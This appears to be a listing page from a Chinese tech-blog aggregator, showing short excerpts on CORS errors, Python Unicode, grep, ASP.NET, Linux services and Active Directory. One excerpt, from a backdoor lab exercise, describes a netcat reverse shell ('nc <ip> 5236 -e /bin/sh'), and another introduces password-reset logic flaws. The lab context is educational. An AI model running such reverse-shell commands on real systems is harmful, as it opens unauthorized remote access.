当使用jQuery Ajax post请求时可能会遇到类似这样的错误提示 XMLHttpRequest cannot oad http://xxxxxx. Origin http://xxxxxx is not allowed by Access-Control-Allow-Origin. 这是Aj ...
分类:
其他好文 时间:
2018-04-25 14:28:04
阅读次数:
158
碎碎念:这几天在学习Python对Unicode的支持 上学的时候,计算机基础课上总能听到老师讲什么字节,字符,Unicode,UTF 8吧啦吧啦一堆,反正我是只记住了名字,至于具体这些名字所表达的含义,当时的我是一点也没有想要好好了解的意愿,必竟是一看就会睡着的内容。 那时候心里想的是,老师能不能 ...
分类:
其他好文 时间:
2018-04-23 00:21:58
阅读次数:
162
一、文件操作 1、需要的参数:1、文件路径 2、编码方式:utf-8 3、动作(读、写、追加....) 绝对路径下: 1,打开文件,产生文件句柄。--就存放到内存中 2,操作文件句柄。 3,关闭文件。 --如果不关闭,就一直存在内存中 相对路径: SyntaxError: (unicode erro ...
分类:
其他好文 时间:
2018-04-17 12:02:32
阅读次数:
182
查看文件中含有“哈哈哈”关键字所在行后5行内容 cat xxxxxx | grep -A 5 哈哈哈 查看文件中含有“哈哈哈”关键字所在行前5行内容 cat xxxxxx | grep -B 5 哈哈哈 查看文件中含有“哈哈哈”关键字所在行前后5行内容 cat xxxxxx | grep -C 5 ...
分类:
其他好文 时间:
2018-04-10 16:03:51
阅读次数:
152
无处不在的HttpContext 由于ASP.NET提供了静态属性HttpContext.Current,因此获取HttpContext对象就非常方便了。也正是因为这个原因,所以我们经常能见到直接访问HttpContext.Current的代码: 这样的代码,经常能在类库项目中看到,由此可见其泛滥程 ...
分类:
Web程序 时间:
2018-04-05 14:31:00
阅读次数:
179
线上的一个海外充值接口(https)经常因我朝网络问题中断,想借助hk的机器做个https反向代理又没证书。 一开始 一开始想到的办法是借助NGINX的tcp转发进行代理: 编译NGINX时加入 with stream 选项, 服务器通过绑定host,将https://xxxxxx.com的访问请求 ...
分类:
Web程序 时间:
2018-04-04 23:27:19
阅读次数:
3752
在逻辑漏洞中,任意用户密码重置最为常见,可能出现在新用户注册页面,也可能是用户登录后重置密码的页面,或者用户忘记密码时的密码找回页面,其中,密码找回功能是重灾区。我把日常渗透过程中遇到的案例作了漏洞成因分析,这次,关注因重置凭证未校验导致的任意用户密码重置问题。 传送门: 任意用户密码重置(一):重 ...
分类:
其他好文 时间:
2018-04-02 11:09:51
阅读次数:
239
实验二 后门原理与实践 1.Windows获得Linux Shell 在windows下,打开CMD,使用ipconfig指令查看本机IP 监听本机的5236端口 在kali端,使用nc指令的 e选项,nc XXX.XXX.XXX.XXX(主机ip) 5236(所设置的端口) e /bin/sh反向 ...
分类:
其他好文 时间:
2018-04-01 19:55:52
阅读次数:
192
【问题描述】 由于最近在使用Spring Eureka的注册中心服务,而办公室每天晚上要断电,每天早上过来后需要手工启动Eureka服务非常麻烦。 需要实现:开机自动该服务的功能。 【思路分析】 可以使用Linux系统的service命令来实现服务的启动 + 用chkconfig命令实现自动启动该服 ...
分类:
系统相关 时间:
2018-03-31 17:28:36
阅读次数:
1624
使用Search-ADAccount-AccountDisabled命令,即可搜索出禁用的AD帐户[PS]D:\>Search-ADAccount-AccountDisabled|Move-ADObject-TargetPath"OU=Disable,OU=xxxx,DC=xx,DC=xxxxxx,DC=net"[PS]D:\>Search-ADAccount-AccountDisab
分类:
移动开发 时间:
2018-03-30 13:17:58
阅读次数:
240